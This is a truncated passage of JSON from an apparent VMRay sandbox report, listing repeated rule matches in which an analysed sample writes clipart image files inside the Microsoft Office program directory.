"ref_id": "gfn_38618", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297727.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297757.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38625", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297757.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297759.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38634", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297759.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0300862.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38643", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0300862.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301044.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38652", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301044.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301052.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38659", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301052.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301418.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38666", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301418.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301432.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38675", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301432.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304371.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38684", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304371.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304405.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38691", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304405.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304853.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38698", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304853.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304861.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38707", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304861.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304875.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38714", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304875.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309480.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38723", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309480.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309567.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38730", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309567.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309585.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38739", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309585.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309598.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38750", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309598.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309664.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38761", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309664.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309705.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38772", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309705.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309902.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38781", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309902.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309904.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38788", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309904.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309920.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38795", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309920.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313896.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38802", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313896.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313965.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38813", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313965.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313970.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38824", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313970.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313974.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38835", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313974.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0314068.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38846", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0314068.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315580.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38855", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315580.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315612.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38864", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315612.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318448.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38873", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318448.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318804.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318804.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38882", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318804.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318810.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318810.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38889", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318810.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0321179.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38896", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0321179.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft 